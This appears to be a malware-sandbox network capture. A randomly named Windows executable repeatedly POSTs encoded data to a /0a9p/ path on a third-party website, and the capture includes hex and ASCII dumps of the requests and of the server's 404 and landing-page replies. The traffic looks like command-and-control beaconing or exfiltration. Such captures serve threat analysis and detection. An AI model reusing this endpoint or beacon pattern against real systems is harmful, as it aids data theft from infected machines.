35 35 57 4d 72 4c 50 55 69 4c 63 35 79 55 42 53 6b 36 41 53 4c 66 48 48 74 44 30 54 5a 44 69 63 6f 79 77 4c 4a 59 2b 38 48 47 64 41 53 79 58 49 77 3d 3d Data Ascii: 9d=Y+MoCjqFkfVpi3IxJFc5J+PiHLUvi0s0M1GYn7//PDLA5p0vsjHkUFmlotcG6OQF0BaVhcnqKEQaA8aOgF++VA4D/80NCV7BCWktlEMKpjPN36lq5B/1ntdY0ZkVcHxx0oBOU3c8dep6ftW8N4l31wNPX8wDZSf8T55WMrLPUiLc5yUBSk6ASLfHHtD0TZDicoywLJY+8HGdASyXIw==
Jun 5, 2024 18:27:45.705521107 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: afb_HTTP.404 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: no-cache transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Wed, 05 Jun 2024 16:27:45 GMT server: LiteSpeed Data Raw: 63 33 36 0d 0a 80 90 02 80 f8 9f d9 ec 7f ef aa 2c f6 a7 c9 60 e8 67 d9 86 40 06 83 49 8f 43 7a 1a d3 c2 ba 60 a5 65 49 4f 92 01 7f 8a aa bf d8 ff c5 62 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 7e 10 1d 44 b3 3a 34 6a 00 ab 37 2a 7b a4 d9 a7 0f bd f9 41 04 00 7b 88 e3 df ec ba c1 0d 85 83 e6 2f f5 14 ca de 96 e0 e9 34 35 34 6f a8 ec 89 90 5f 8f 48 d8 b6 7a 40 49 50 a7 04 9b 7f 6f cc 7c c5 15 95 c3 1e 51 6e 4c 60 83 f6 b5 3f 3c 7e 0b c6 e6 ed f8 b0 0f cf ee 3f bb ff 04 a7 8f 76 68 a6 60 36 60 f1 f7 79 68 74 e5 28 10 4e 1f e1 da 49 1d a4 5e e1 49 ab 54 87 e7 3a d0 ca f1 40 02 ef cd c2 04 59 e1 43 e7 03 35 be 97 cd 0f 46 a4 9a 68 56 40 93 b3 34 0e 0a e3 bc 09 56 c6 ac 14 59 d5 7a 12 59 3a b5 86 d9 37 a6 45 92 cf e1 6b 32 fd 59 2c 68 d0 0c 6e 9d 02 ff 4d aa 43 b0 be c8 32 5f f3 9a 2f 4f 45 5a 99 86 40 9b d0 f2 e0 66 31 bd e9 21 8b 89 72 25 d1 65 67 1b cb 80 5e 37 6b ad 32 5c f8 6c 94 8f 4e [TRUNCATED] Data Ascii: c36,`g@ICz`eIOb]Bd"dDV1=_P[I9fb\d~D:4j7{A{/454o_Hz@IPo\|QnL`?<~?vh`6`yht(NI^IT:@YC5FhV@4VYzY:7Ek2Y,hnMC2_/OEZ@f1!r%eg^7k2\lN"m1;hf?,2=62r5+KH9INW&&(7PA+B;k\52ofz9Ilt~u9N0m@\l$6REUBRKB-7MC$AR54:Ter+}V_q?\|vyr8v)so6$kIA<;;f,mA^$AmpCpL 6{BbZN1<h ~bt?&&xb8`{n\=LQR&8'I}Xc\iZ5W@mc_EE>x`ZU(AW}7?qBJeet!sjN+5\$>_4n'qQMIY
Jun 5, 2024 18:27:45.705542088 CEST	212	IN	Data Raw: d1 cb fd d2 b8 93 f3 48 28 3d ac b3 b3 7a 53 49 ae 98 92 3e a4 4d 26 38 17 47 07 4b e1 d6 40 d8 67 45 6d d6 e4 44 5a 81 03 3c c0 af 97 b3 7f 2a 25 0b 6d 42 bf 50 dc 07 66 96 2c 74 96 06 45 31 e6 68 5d 43 f3 a8 90 28 11 97 83 d9 86 9e 67 0a 2c 76 Data Ascii: H(=zSI>M&8GK@gEmDZ<*%mBPf,tE1h]C(g,vv1LP9vtYI460eVf//o[4g\|rq1fJK_K_bfYO2O=dRl{CEFiDb6.TFv#
Jun 5, 2024 18:27:45.705558062 CEST	1236	IN	Data Raw: 0a 0c f3 fc 38 fd 67 5c 39 aa b8 0d 55 cd d9 82 8b 15 61 37 66 97 c5 d0 46 93 5b 08 b9 64 79 e1 e4 aa 87 27 c0 6f 72 b8 12 d6 b1 1d 35 c7 60 a7 4f 2f c8 ad 25 ee b8 ae a8 40 0a 6b aa 81 f4 73 05 e1 c2 89 02 6f 57 5e 07 08 99 81 f4 84 c8 a5 b4 b5 Data Ascii: 8g\9Ua7fF[dy'or5`O/%@ksoW^`EV{o0R{P\|UizA$\|F3O0YBOH?ro3HW5krwZk-{9ys>5W2tEQH5{rI8nV.8
Jun 5, 2024 18:27:45.705576897 CEST	212	IN	Data Raw: 70 2d 41 9f bb 32 c6 3e c1 6e ac 23 ef 87 b2 80 75 02 0a e7 18 e2 aa 70 f6 6c f8 0b 05 62 da 0a 7d 6d 36 d7 8c a3 c3 1c b1 ae 6d fb 59 06 d7 12 a5 94 6a 34 9a 9a 08 22 cf ac d1 df 39 d9 5d 7c b0 bc 98 89 e6 46 db 51 62 9b 8f b7 e6 0e fc 96 6f bf Data Ascii: p-A2>n#uplb}m6mYj4"9]\|FQboONI&Y'-yvZ>SV6,UKD\|bBV_D<K8Csr`FQLi#xVq VJP
Jun 5, 2024 18:27:45.705843925 CEST	619	IN	Data Raw: af b4 ad 2b c4 31 8a 24 1c 8b a3 29 6c 20 bf 5b 94 76 39 05 59 4d 21 bf 34 ef 35 96 14 aa ba 5f c9 66 fa 87 07 3a 76 ab 40 7c fd f6 c3 47 1d 01 a3 e6 e9 95 2f 00 15 03 40 ec ad 1d c5 3e 76 96 e2 02 f1 aa 20 45 5b b6 d9 6c bc cc 8b b5 4e 91 ae 8c Data Ascii: +1$)l [v9YM!45_f:v@\|G/@>v E[lN 1]cmX"C3WlVpW{aDWxiam\K'.~dy*v`~ziC_rHI>)Q9O$=$`Gf?h'){Ar7LyjJr=.
Jun 5, 2024 18:27:45.710813046 CEST	11	IN	Data Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49720	64.46.118.35	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:46.783699036 CEST	722	OUT	POST /0a9p/ HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.shahaf3d.com Referer: http://www.shahaf3d.com/0a9p/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 77 47 34 78 4f 69 6f 35 49 65 50 74 62 37 55 76 6f 55 73 77 4d 31 4b 59 6e 36 37 4a 50 78 76 41 35 4a 45 76 74 69 48 6b 58 46 6d 6c 6e 4e 63 44 6b 2b 51 4f 30 41 6d 64 68 5a 6e 71 4b 45 45 61 41 2b 79 4f 67 53 4b 39 56 51 34 42 33 63 30 50 4d 31 37 42 43 57 6b 74 6c 45 49 6b 70 6a 33 4e 33 4c 56 71 6f 51 2f 79 72 4e 64 66 7a 5a 6b 56 4e 58 78 31 30 6f 42 38 55 32 51 57 64 61 5a 36 66 73 6d 38 4d 70 6c 77 2b 77 4e 4a 59 63 78 54 49 48 71 50 5a 61 31 72 41 59 33 58 55 51 6e 50 38 45 4a 6a 49 47 32 73 4d 61 6e 38 44 76 6e 43 45 2f 65 58 65 70 32 6f 47 72 73 66 6a 77 6a 33 4e 41 54 54 65 50 6c 61 6c 6e 74 42 6d 30 69 6a 32 79 36 53 79 49 6f 68 6b 6b 49 3d Data Ascii: 9d=Y+MoCjqFkfVpwG4xOio5IePtb7UvoUswM1KYn67JPxvA5JEvtiHkXFmlnNcDk+QO0AmdhZnqKEEaA+yOgSK9VQ4B3c0PM17BCWktlEIkpj3N3LVqoQ/yrNdfzZkVNXx10oB8U2QWdaZ6fsm8Mplw+wNJYcxTIHqPZa1rAY3XUQnP8EJjIG2sMan8DvnCE/eXep2oGrsfjwj3NATTePlalntBm0ij2y6SyIohkkI=
Jun 5, 2024 18:27:48.217691898 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: afb_HTTP.404 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: no-cache transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Wed, 05 Jun 2024 16:27:48 GMT server: LiteSpeed Data Raw: 63 33 36 0d 0a 80 90 02 80 f8 9f d9 ec 7f ef aa 2c f6 27 64 30 f4 b3 6c 43 c8 d0 06 93 1e 07 7a 1a d3 c2 ba 60 a5 65 49 4f 92 01 7f 8a aa bf d8 ff c5 62 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 3a 34 6a 00 ab 37 2a 7b a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 0d 85 83 e6 2f f5 14 ca de 96 e0 e9 34 35 34 6f a8 ec 89 90 5f 8f 48 d8 b6 7a 40 49 50 a7 04 9b 7f 6f cc 7c c5 15 95 c3 1e 51 6e 4c 60 83 f6 b5 3f 3c 7e 0b c6 66 ed f8 b0 0f cf ee 3f bb ff 04 67 8f 76 68 a6 60 36 60 f1 f7 79 68 74 e5 28 10 ce 1e 61 ee a4 0e 52 af f0 a4 55 aa c3 73 1d 68 e5 78 20 81 f7 66 61 82 ac f0 a1 f3 81 1a df cb 66 07 23 52 4d 34 2b a0 c9 59 1a 07 85 71 de 04 2b 63 56 8a ac 6a 3d 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 b7 4e 81 ff 26 d5 21 58 5f 64 99 af 79 cd 97 67 22 ad 4c 43 a0 4d 68 79 70 b3 98 de f4 90 c5 44 b9 92 e8 b2 b3 8d 65 40 af 9b b5 56 19 2e 7c 36 ca 47 67 [TRUNCATED] Data Ascii: c36,'d0lCz`eIOb]Bd"dDV1=_P[I9fb\dvD:4j7{A{/454o_Hz@IPo\|QnL`?<~f?gvh`6`yht(aRUshx faf#RM4+Yq+cVj=,Z"5,4hN&!X_dyg"LCMhypDe@V.\|6GgY~VA4H]1\M(R,.inruC,IM07TJN#'WeDlv0z]a:ouG7W72>Ei=f\|e>iRqGoE9xkyPvi V)^UY\|2s+w`R8O.k)y\y2;]xA`ZR!O$"<w$#DjdIh#>\%h:4+fOHlXI7=2vMO_98X^m7WzgI=NgRPGc4zGs61/gGU>x`ZU(AW}woXibCJVjT_I}hzh1`7N&w
Jun 5, 2024 18:27:48.217706919 CEST	1236	IN	Data Raw: a2 97 fb a5 71 27 e7 91 50 7a 58 67 67 f5 a6 92 5c 31 25 7d 48 9b 4c 70 2e 8e 0e 96 c2 ad 81 b0 cf 8a da ac c9 89 b4 02 07 78 80 5f 2f 67 ff 54 4a 16 da 84 7e a1 b8 0f cc 2c 59 e8 2c 0d 8a 62 cc d1 ba 86 e6 51 21 51 22 2e 07 b3 0d 3d cf 14 58 ec Data Ascii: q'PzXgg\1%}HLp.x_/gTJ~,Y,bQ!Q".=Xc^L(r)rQ%5m'im` GT_2_ZQo_Yzw<^^/5Z]J3zyAtu eC-m0JC&q2kU`'?Qmj\1,6B%
Jun 5, 2024 18:27:48.217719078 CEST	424	IN	Data Raw: 4a c5 f5 2c 6f 78 43 38 2c 4b c4 33 9e 32 6b b5 b7 8a fb 3a 86 20 a9 e6 5f e7 7a 25 7d 48 b9 10 fd 58 75 7d 64 c1 c0 d9 f9 5a 18 d1 65 b3 db 73 4c be c0 44 a4 95 cd 59 fb 28 44 55 5d 7a e8 b3 b0 75 ca ad cf 96 18 56 ca d6 52 c8 26 c6 fc e8 b7 fe Data Ascii: J,oxC8,K32k: _z%}HXu}dZesLDY(DU]zuVR&z]<Mos/mU{B~p_dYgvomvu(`vj6c%aUT?@~.xW%Cg]PLYqb*b_Kk1vcy?P8g_(
Jun 5, 2024 18:27:48.219086885 CEST	619	IN	Data Raw: 7a a5 6d 5d 23 8e 51 24 e1 58 1c 4d 60 03 f9 dd a2 b4 cb 29 c8 6a 0a f9 a5 79 af b1 a4 50 d5 fd 4a 36 d3 3f 3c d0 b1 5b 05 e2 f9 db 0f 1f 75 04 8c 9a a7 57 be 00 54 0c 00 b1 b7 76 14 fb d8 59 8a 0b c4 ab 82 14 6d d9 66 b3 f1 32 2f d6 3a 45 ba 32 Data Ascii: zm]#Q$XM`)jyPJ6?<[uWTvYmf2/:E2dUag(v_)a#ZU\ ~^]?cYe yS~ep-i$<'F}`*1&D?$giST]Tfdr$H/{3)
Jun 5, 2024 18:27:48.220009089 CEST	11	IN	Data Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49721	64.46.118.35	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:49.328383923 CEST	1735	OUT	POST /0a9p/ HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.shahaf3d.com Referer: http://www.shahaf3d.com/0a9p/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 77 47 34 78 4f 69 6f 35 49 65 50 74 62 37 55 76 6f 55 73 77 4d 31 4b 59 6e 36 37 4a 50 78 6e 41 35 36 4d 76 72 42 2f 6b 57 46 6d 6c 75 74 63 43 6b 2b 51 54 30 42 4f 5a 68 5a 6a 51 4b 48 38 61 41 66 53 4f 30 32 57 39 62 51 34 42 37 38 30 4d 43 56 37 51 43 57 31 6c 6c 45 34 6b 70 6a 33 4e 33 49 39 71 6f 42 2f 79 74 4e 64 59 30 5a 6c 61 63 48 77 67 30 6f 5a 73 55 32 55 73 64 70 52 36 63 4d 32 38 4c 62 39 77 69 67 4e 78 5a 63 77 57 49 48 75 51 5a 63 52 52 41 5a 54 74 55 54 33 50 38 67 67 59 63 44 57 31 4f 4c 33 42 46 76 62 51 4d 73 62 71 59 72 6d 45 4e 4b 34 47 2b 52 6a 4e 55 77 2f 59 53 72 6c 58 77 6d 52 4f 69 58 43 45 2f 46 72 62 74 35 6f 79 78 53 50 55 72 33 55 35 42 5a 73 2b 31 46 6f 61 4c 4f 62 49 32 73 78 77 6c 79 69 31 6a 33 41 59 39 32 48 41 5a 73 58 74 33 30 35 6d 74 78 72 46 38 69 4f 46 45 48 6e 75 6c 52 4d 37 70 6a 45 65 68 4e 54 5a 2b 70 35 77 6f 48 4d 71 48 64 62 31 7a 49 35 30 30 6c 50 32 4a 7a 4d 50 73 48 74 50 74 63 73 61 31 71 31 74 6a 6b 39 [TRUNCATED] Data Ascii: 9d=Y+MoCjqFkfVpwG4xOio5IePtb7UvoUswM1KYn67JPxnA56MvrB/kWFmlutcCk+QT0BOZhZjQKH8aAfSO02W9bQ4B780MCV7QCW1llE4kpj3N3I9qoB/ytNdY0ZlacHwg0oZsU2UsdpR6cM28Lb9wigNxZcwWIHuQZcRRAZTtUT3P8ggYcDW1OL3BFvbQMsbqYrmENK4G+RjNUw/YSrlXwmROiXCE/Frbt5oyxSPUr3U5BZs+1FoaLObI2sxwlyi1j3AY92HAZsXt305mtxrF8iOFEHnulRM7pjEehNTZ+p5woHMqHdb1zI500lP2JzMPsHtPtcsa1q1tjk9IY03zE5fEQyP80/uGolVQG8I1zZG04qyR5dXxCpJIcZXEwmlxQGBy4jhQnGYF8Pa0QGAYDVHj6dt8/P0AZWP7H+tK25NKAqtuGVPnBjbO4ozSewx2XfC6RFuButacvwptn9iWlxXRpRtEZtnD433LMKKnt9pmPO38JHSAU3+QaWdBMpazfj4sY4t1TnQ+NGU3U04jJQLiUVIwYOg/XwdZVp2ECp6usKPCuDcF3rX/a1F/L4rU1qz8zlObsQv963yq5T+4SDjrjjqQWBNhMufbPF23TavHeE589dW3vx97acNHDItdV0YOXK60+zs+RtoAlqOkTN76CNRSq6U+bV0XYCGy9zs86516ZGUSAS5YAZKmRHkv7tcEcOIZk9YlIEi2dRgdsj7KJmhbSGoWa77saKp/P9Moi2zol+236ycu1HfvUFdaBDasFEQlevG5tssY07aAd6p/omN6POBazNE65VfI4/pcIosKIC7b+SjMT314dpM2IBvM+KhuDQpfe9PQH9aOnaITqcI6cZVJvwb29qovLlyEhBykGWpjqGdjLmBkPZgXpTBvYYcewENPNGlUvk/FcNjpSFFyCRL/dbIMoOCXUTzb4F8ZmrunpuiLhNMvc3nIb4Tco4l5d/PSkKqdaY0/nf5cyybYblilpsU0YtUsFhpjn1uWr [TRUNCATED]
Jun 5, 2024 18:27:50.729536057 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: afb_HTTP.404 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: no-cache transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Wed, 05 Jun 2024 16:27:50 GMT server: LiteSpeed Data Raw: 63 33 35 0d 0a 80 90 02 80 f8 9f d9 ec 7f ef aa 2c f6 a7 c9 60 e8 67 d9 86 40 06 83 49 8f 43 7a 1a d3 c2 ba 60 a5 65 49 4f 92 01 7f 8a aa bf d8 ff c5 62 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 7e 10 1d 44 b3 3a 34 6a 00 ab 37 2a 7b a4 d9 a7 0f bd f9 41 04 00 7b 88 e3 df ec ba c1 0d 85 83 e6 2f f5 14 ca de 96 e0 e9 34 35 34 6f a8 ec 89 90 5f 8f 48 d8 b6 7a 40 49 50 a7 04 9b 7f 6f cc 7c c5 15 95 c3 1e 51 6e 4c 60 83 f6 b5 3f 3c 7e 0b c6 e6 ed f8 b0 0f cf ee 3f bb ff 04 a7 8f 76 68 a6 60 36 60 f1 f7 79 68 74 e5 28 10 4e 1f e1 da 49 1d a4 5e e1 49 ab 54 87 e7 3a d0 ca f1 40 02 ef cd c2 04 59 e1 43 e7 03 35 be 97 cd 0f 46 a4 9a 68 56 40 93 b3 34 0e 0a e3 bc 09 56 c6 ac 14 59 d5 7a 12 59 3a b5 86 d9 37 a6 45 92 cf e1 6b 32 fd 59 2c 68 d0 0c 6e 9d 02 ff 4d aa 43 b0 be c8 32 5f f3 9a 2f 4f 45 5a 99 86 40 9b d0 f2 e0 66 31 bd e9 21 8b 89 72 25 d1 65 67 1b cb 80 5e 37 6b ad 32 5c f8 6c 94 8f 4e [TRUNCATED] Data Ascii: c35,`g@ICz`eIOb]Bd"dDV1=_P[I9fb\d~D:4j7{A{/454o_Hz@IPo\|QnL`?<~?vh`6`yht(NI^IT:@YC5FhV@4VYzY:7Ek2Y,hnMC2_/OEZ@f1!r%eg^7k2\lN"m1;hf?,2=62r5+KH9INW&&(7PA+B;k\52ofz9Ilt~u9N0m@\l$6REUBRKB-7MC$AR54:Ter+}V_q?\|vyr8v)so6$kIA<;;f,mA^$AmpCpL 6{BbZN1<h ~bt?&&xb8`{n\=LQR&8'I}Xc\iZ5W@mc_EE>x`ZU(AW}7?qBJeet!sjN+5\$>_4n'qQMIY
Jun 5, 2024 18:27:50.729581118 CEST	1236	IN	Data Raw: d1 cb fd d2 b8 93 f3 48 28 3d ac b3 b3 7a 53 49 ae 98 92 3e a4 4d 26 38 17 47 07 4b e1 d6 40 d8 67 45 6d d6 e4 44 5a 81 03 3c c0 af 97 b3 7f 2a 25 0b 6d 42 bf 50 dc 07 66 96 2c 74 96 06 45 31 e6 68 5d 43 f3 a8 90 28 11 97 83 d9 86 9e 67 0a 2c 76 Data Ascii: H(=zSI>M&8GK@gEmDZ<*%mBPf,tE1h]C(g,vv1LP9vtYI460eVf//o[4g\|rq1fJK_K_bfYO2O=dRl{CEFiDb6.TFv#8g\9Ua7fF[dy
Jun 5, 2024 18:27:50.729614019 CEST	1042	IN	Data Raw: 54 5c cf f2 86 37 84 3b 65 89 78 c6 53 66 ad f6 56 71 5f c7 10 24 d5 fc eb 5c af a4 0f 29 17 a2 1f ab ae 8f 2c 18 38 3b 5f 0b 23 ba 6c 76 7b 8e c9 17 98 88 b4 b2 39 6b 1f 85 a8 aa 4b 0f 7d 16 b6 4e b9 f5 d9 12 c3 4a d9 5a 0a d9 c4 98 1f fd d6 5f Data Ascii: T\7;exSfVq_$\),8;_#lv{9kK}NJZ_a^<I-ljO,LtAYvX}\|.e5NM#abd:lwU$ua,Z>s)k\| W N;SZyi@@p-A2>n#uplb
Jun 5, 2024 18:27:50.731667042 CEST	11	IN	Data Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49722	64.46.118.35	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:51.909708977 CEST	447	OUT	GET /0a9p/?G0a=VFN0vBc0ol1ljnb0&9d=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SaRICxMFUNkXtPm1N7nAwt3H84qVeuxzzlvsq+rVjUlYjzq9gXVFKEYh8 HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:27:53.448247910 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_ x-litespeed-cache: miss transfer-encoding: chunked date: Wed, 05 Jun 2024 16:27:53 GMT server: LiteSpeed Data Raw: 32 39 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 45 4f 20 2d 2d 3e 0d 0a 3c 74 69 74 6c 65 3e 53 48 41 48 41 46 20 33 44 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 21 2d 2d 20 6f 67 20 6d 65 74 61 20 66 6f 72 20 66 61 63 65 62 6f 6f 6b 2c 20 67 6f 6f [TRUNCATED] Data Ascii: 29b1<!DOCTYPE html><html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... SEO --><title>SHAHAF 3D</title><meta name="description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/>... og meta for facebook, googleplus --><meta property="og:title" content="SHAHAF 3D"/><meta property="og:description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/><meta property="og:url" content="https://shahaf3d.com"/><meta property="og:type" content="website" /><meta property="og:image" content="https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg"/>... twitter meta --><meta name="twitter:card" content="summary_large_image"/><m
Jun 5, 2024 18:27:53.448256016 CEST	1236	IN	Data Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 48 41 48 41 46 20 33 44 22 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 Data Ascii: eta name="twitter:title" content="SHAHAF 3D"/><meta name="twitter:description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/><meta name="twitter:url" content="https://shahaf3d.com"/><meta name="twitter:image" content="
Jun 5, 2024 18:27:53.448262930 CEST	1236	IN	Data Raw: 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 39 30 38 30 31 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6d 70 2d 73 75 62 73 63 72 69 62 65 20 3a 3a 2d 77 65 Data Ascii: nput[type="submit"] {background-color: #190801;} .cmp-subscribe ::-webkit-input-placeholder {color: hsl( 0, 0%, 90%);} .cmp-subscribe ::-moz-placeholder {color: hsl( 0, 0%, 90%);} .cmp-subscribe :-ms-inpu
Jun 5, 2024 18:27:53.448321104 CEST	1236	IN	Data Raw: 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 2e 77 70 2d 76 69 64 65 6f 20 7b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0d 0a 20 20 20 20 2e 77 70 2d 76 69 64 65 6f 2d 73 68 6f 72 74 63 6f 64 65 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 Data Ascii: <style> .wp-video {margin: 0 auto;} .wp-video-shortcode {max-width: 100%;} .grecaptcha-badge {display: none!important;} .text-logo {display: inline-block;} #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance
Jun 5, 2024 18:27:53.448333979 CEST	848	IN	Data Raw: 61 3d 56 46 4e 30 76 42 63 30 6f 6c 31 6c 6a 6e 62 30 26 23 30 33 38 3b 39 64 3d 56 38 6b 49 42 55 4f 39 39 50 52 32 68 33 68 78 49 69 6c 47 43 62 37 78 61 59 41 6c 68 58 63 74 41 48 62 47 77 59 66 44 4b 79 75 73 76 4b 34 71 72 52 58 35 55 48 4b Data Ascii: a=VFN0vBc0ol1ljnb0&9d=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SaRICxMFUNkXtPm1N7nAwt3H84qVeuxzzlvsq+rVjUlYjzq9gXVFKEYh8" /> <input type="email" id="email-subscribe" name="
Jun 5, 2024 18:27:53.448343992 CEST	1236	IN	Data Raw: 64 27 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0a 0a 63 6f 6e 73 74 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 75 62 73 63 72 69 62 65 2d 66 6f 72 6d 27 29 3b 0a 63 6f 6e 73 Data Ascii: d',function(event) {const form = document.getElementById('subscribe-form');const submitButton = form.querySelector('#submit-subscribe');const resultElement = form.querySelector('#subscribe-response');const emailInput = form.querySelector
